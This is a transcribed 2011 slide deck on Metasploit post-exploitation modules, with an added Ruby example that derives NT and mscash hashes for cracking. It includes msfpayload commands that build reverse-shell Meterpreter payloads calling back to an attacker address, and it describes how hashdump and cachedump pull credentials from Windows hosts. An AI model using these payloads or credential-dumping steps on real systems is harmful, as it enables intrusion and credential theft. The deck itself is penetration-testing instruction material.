
Deep Dive into Red Teaming with the Metasploit Framework


James “egyp7” Lee
March 22, 2011

Outline

• Metasploit Framework architecture
• What are Metasploit modules?
• Post-exploitation modules
• Building other types of payloads
• Platform-agnostic payloads
• New Metasploit Express/Pro features
• Live Demo

This presentation is for advanced Metasploit Framework users!

Metasploit overview

• Metasploit Project founded in 2003
• Open source penetration testing platform with over 1 million downloads in the past year
• Acquired by Rapid7 in 2009
• HD Moore joined Rapid7 as Chief Security Officer and Chief Architect of Metasploit
• Rapid7 remains committed to the community
• Metasploit Framework is the foundation for the commercial editions Metasploit Express and Metasploit Pro

Metasploit Framework architecture

(Layered architecture diagram, recovered from the slide)
Libraries (bottom to top): Rex, MSF Core, MSF Base
Interfaces: Console, CLI, GUI & Armitage, RPC
Tools and Plugins: sit alongside the libraries
Modules: Exploit, Payload, Encoder, NOP, Auxiliary
What are Metasploit modules?

• More than just exploits
• Payloads – the “arbitrary code” you hear about in advisories
• Encoders – add entropy to payloads, remove bad characters
• NOP – create sophisticated nopsleds
• Auxiliary – like an exploit module but without a payload (scanners, fuzzers, fake servers, …)
– Underappreciated

Metasploit Framework architecture

(Same architecture diagram as before, with a sixth module type added)
Modules: Exploit, Payload, Encoder, NOP, Auxiliary, Post
Back in the day

• Best post-exploitation option was irb
• Still staggeringly useful but hard to automate
• Enter: Meterpreter scripts

Meterpreter scripts

Good:
• Re-read before every run
– Easier development
• Simple interface
• Anything Ruby can do
• Access to the framework and the session

Not so good:
• No structure
• No metadata
• No generic compatibility checks
• Ad-hoc options
• Only work on Meterpreter
• Not easy to reuse code

New hotness: post-exploitation modules

• Newest and least-explored module type
– Great place to start contributing to the framework
• Intended to replace Meterpreter scripts
– Should retain the good aspects
– Improve the not-so-good aspects
Keeping the good

• Always reloaded when run from meterpreter>
– Can use the reload and rerun commands in msf>
• Simple interface
• Anything Ruby can do
• Access to the Framework and the session
– Actually easier than scripts

Improving the not-so-good

• Structured like other module types
– Improves consistency
– Includes metadata like author, description, etc.
• Option setting consistent with other modules
– set VAR value
• Mixins for some common tasks, more on the way
– File system manipulation
– Registry twiddling
– Running commands

Using post-exploitation modules

• Like exploits, can be Active or Passive
• Like auxiliary modules, they are launched with the run command (exploit is an alias)
• Take a SESSION option
• Define what kinds of sessions are compatible
– Meterpreter, shell
– Different platforms

Three ways to run them

• Directly from meterpreter> with the run command
– run post/windows/gather/resolve_sid SID=S-1-5-1
• Via the normal module interface
– use post/windows/gather/resolve_sid
– set SID S-1-5-1
– run
• As an AutoRunScript
– use exploit/some/module
– set AutoRunScript post/windows/gather/resolve_sid SID=S-1-5-1
– exploit

Railgun

• Not new exactly, but undergoing some major improvements
• Arbitrary Ruby -> remote Windows API bridge
• Call any function in any DLL on the system
• Use an application’s own API against it
– Chrome/Firefox stored passwords
– Many potential uses here

Loot

• Pilfered data
• Can be anything, stored in a file
– Process listing
– Environment variables
• Usually not passwords (use Creds table for that)

Awesome Post Modules

• Hashdump
– Similar in function to the hashdump command
– Instead of injecting into lsass, just reads the SAM and SYSTEM hives through the registry (needs SYSTEM privileges)
– Calculates everything necessary (boot key, hashed boot key, per-RID DES keys) to pull hashes directly out of SAM
• There’s an OS X version now!
– Reads /var/db/shadow/hash/<user guid>
– Grabs SHA1, NT, and LM hashes

Third-party post-exploitation modules

• Cachedump from Maurizio Agazzini
– Like hashdump, but grabs cached domain credentials
– mscash format for easy cracking (salted with the username, so it can’t be used with pass-the-hash)
– Gets credentials of terminal services/RDP users too
– Will eventually be merged into trunk, but serves as an example of adding your own stuff
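The two slides above hinge on one difference: an NT hash is an unsalted MD4 of the UTF-16LE password (so it can be replayed with pass-the-hash), while a cached domain credential in mscash (DCC1) format is MD4 of the NT hash concatenated with the lowercased UTF-16LE username, so it is salted per user and has to be cracked. The following is an added example, not code from the presentation nor from the hashdump or cachedump modules. It carries its own pure-Ruby MD4 (RFC 1320) because OpenSSL 3 only ships MD4 in its legacy provider; the usernames and passwords are constructed, the `M$user#hash` line is the input form John the Ripper's mscash format expects, and the DES-based LM hash and the PBKDF2-based mscash2 variant used from Vista onward are out of scope here.

```ruby
# Added example: NT hash and mscash (DCC1) derivation, with a pure-Ruby MD4
# so it runs without OpenSSL's legacy provider. Not Metasploit module code.

module MD4
  MASK = 0xffffffff
  R1 = [3, 7, 11, 19].freeze
  R2 = [3, 5, 9, 13].freeze
  R3 = [3, 9, 11, 15].freeze
  # Message-word order for rounds 2 and 3 (RFC 1320).
  X2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15].freeze
  X3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15].freeze

  def self.rotl(v, s)
    ((v << s) | (v >> (32 - s))) & MASK
  end

  def self.digest(msg)
    m = msg.b                      # binary copy of the input
    bit_len = m.bytesize * 8
    m << "\x80".b                  # padding: 0x80, zeros, 64-bit LE length
    m << "\x00".b until m.bytesize % 64 == 56
    m << [bit_len & MASK, bit_len >> 32].pack("V2")

    a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
    m.unpack("C*").each_slice(64) do |blk|
      x = blk.pack("C*").unpack("V16")   # sixteen little-endian words
      aa, bb, cc, dd = a, b, c, d
      16.times do |i|                    # round 1: F = (b & c) | (~b & d)
        a = rotl((a + ((b & c) | (~b & d)) + x[i]) & MASK, R1[i % 4])
        a, b, c, d = d, a, b, c
      end
      16.times do |i|                    # round 2: G = majority(b, c, d)
        a = rotl((a + ((b & c) | (b & d) | (c & d)) + x[X2[i]] + 0x5a827999) & MASK, R2[i % 4])
        a, b, c, d = d, a, b, c
      end
      16.times do |i|                    # round 3: H = b ^ c ^ d
        a = rotl((a + (b ^ c ^ d) + x[X3[i]] + 0x6ed9eba1) & MASK, R3[i % 4])
        a, b, c, d = d, a, b, c
      end
      a = (a + aa) & MASK; b = (b + bb) & MASK
      c = (c + cc) & MASK; d = (d + dd) & MASK
    end
    [a, b, c, d].pack("V4")
  end

  def self.hexdigest(msg)
    digest(msg).unpack("H*").first
  end
end

# NT hash: MD4 over the UTF-16LE password. No salt, so it is directly
# replayable (pass-the-hash).
def nt_hash(password)
  MD4.digest(password.encode("UTF-16LE").b)
end

# mscash / DCC1: MD4(NT hash || UTF-16LE(lowercase username)). The username
# acts as a salt, so the cached value cannot be passed, only cracked.
def mscash(username, password)
  MD4.digest(nt_hash(password) + username.downcase.encode("UTF-16LE").b)
end

# Line in the form John the Ripper's mscash format consumes: M$user#hexhash
def mscash_line(username, password)
  ["M$", username, "#", mscash(username, password).unpack("H*").first].join
end

if __FILE__ == $PROGRAM_NAME
  puts "NT hash of 'password': #{nt_hash('password').unpack('H*').first}"
  puts mscash_line("Alice", "Secret1")   # constructed user and password
end
```

Two users with the same password share one NT hash but get different mscash values, which is exactly why the slide says these go to a cracker rather than to pass-the-hash.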

Modules in the works

• Something for going from shell -> Meterpreter
– And from Java/PHP -> native Meterpreter
• Local exploits!
– Already have modules for four Windows privilege escalations
– And a generic service auditor
– Also planning to implement Linux local exploits for shell sessions
• Porting scripts to the module format

Where to put it…

• Official modules live in msf3/modules/
– Subdirectories organized by module type (exploit/, auxiliary/, post/, …)
• ~/.msf3/modules/ has the same structure, loaded at startup if it exists

Platform-agnostic payloads
Java

• msfpayload java/meterpreter/reverse_tcp LHOST=192.168.99.1 X > foo.jar
• msfpayload java/meterpreter/reverse_tcp LHOST=192.168.99.1 W > foo.war

PHP

• msfpayload php/meterpreter_reverse_tcp LHOST=192.168.99.1 R > foo.php

Commercial Feature Highlights

Pro console! All of the above and more is easily accessible in the Metasploit Pro Console

Commercial Feature Highlights

Post-exploitation modules in Metasploit Pro/Express

Commercial Feature Highlights

Host tags are Awesome™

Quick demos
Questions?

James “egyp7” Lee

@egyp7

egypt@metasploit.com
